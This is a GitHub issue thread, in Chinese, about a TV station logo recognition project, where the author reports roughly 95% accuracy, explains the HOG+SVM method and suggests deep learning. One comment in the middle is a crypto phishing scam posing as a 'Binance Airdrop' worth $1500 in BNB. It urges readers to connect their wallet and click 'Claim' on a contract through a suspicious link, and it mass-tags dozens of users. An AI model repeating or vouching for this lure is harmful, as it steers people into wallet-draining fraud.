### ISSUE TITLE
请问一下这个台标识别的功能效果如何呢？

### ISSUE THREAD

**Issue by haohaohihi** [sunbinbin1991/logo-detect#1]

**Comment by sunbinbin1991** [comment]
我在自己的测试集上大约是95%左右

**Comment by haohaohihi** [comment]
膜拜大神！！！

**Comment by haohaohihi** [comment]
另外，我看代码里面有好几个版本，请问您最终使用的是哪一个呢，5_5这个版本吗？能否有空写一下readme呢？

**Comment by sunbinbin1991** [comment]
不太清楚是否对你有帮助，因为我的训练模型还是挺大，并且总台标的个数也是比较多的（约100多个），如果有时间我会放一个我训练模型，让这个直接跑起来，貌似训练代码也没整理

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @uyarn, @Binamra7, @GregLukosek, @jeziorskilukasz, @xforever1313, @edwjusti, @andreaborio, @ollie100, @markoprodanovic, @helloxdao, @brujax89, @sepivip, @softmarshmallow, @prakharindoria, @countable, @H-ZL, @seunggabi, @clalmy, @jiheon-dev, @kqke, @ChristoWolf, @chenjia901, @mattnds, @Cyberflame2020, @familyachil, @drlappies, @dmachine7, @noosestroke, @huy4ng, @hannesfant, @TheStandardPancake, @bshawk, @CohibAA, @bobbyiliev, @TheShadow29, @eljovan3s, @HollowedEmpire, @thintmyatnyinyi, @raenphi, @Tekipeps, @Marcushawley, @JerryYu512, @Eucladia, @krishnakumarcn, @ImranVirani, @kasvith, @pdoggi, @wave2future, @StinkyAndTheBraiin, @fosscat

**Comment by sunbinbin1991** [comment]
这个台标识别还是比较传统的方法，hog+SVM
现在还是建议使用深度学习来做，先检测，后识别，准确率肯定提升较大
现有的代码，实际上还缺少检测台标这部分，估计后面也没时间补充了
